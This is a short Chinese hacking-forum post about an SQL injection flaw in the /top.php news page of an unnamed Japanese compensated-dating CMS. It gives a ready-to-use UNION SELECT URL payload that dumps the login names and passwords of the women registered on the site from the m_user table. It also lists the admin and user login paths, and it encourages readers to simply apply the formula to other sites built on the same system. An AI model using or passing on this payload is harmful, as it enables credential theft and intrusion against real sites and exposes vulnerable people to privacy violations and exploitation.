日本某交友援交CMS注入漏洞

作者：hack1990 时间：12-11-14 阅读数：1015人阅读

前台新闻页面未做过滤或者正则，导致可以通过SQL注入语句将援交女的登陆信息爆出来

漏洞文件:/top.php

前台注入得到援交女的登陆名和登陆密码：

漏洞分析：
注入语句很简单，前台文件一模一样，数据库结构也是一样的，直接套公式好了

日本某交友援交CMS注入漏洞
1 /top.php?mode=news&t=0+union+select+1,2,3,group_concat(DISTINCT+login_id,0x3a,pass,0x3c62723e),5,6,7,8,9,0,11,12,13+from+m_user%23

后台/admin.php
交友女登陆入口：/user.php

相关文章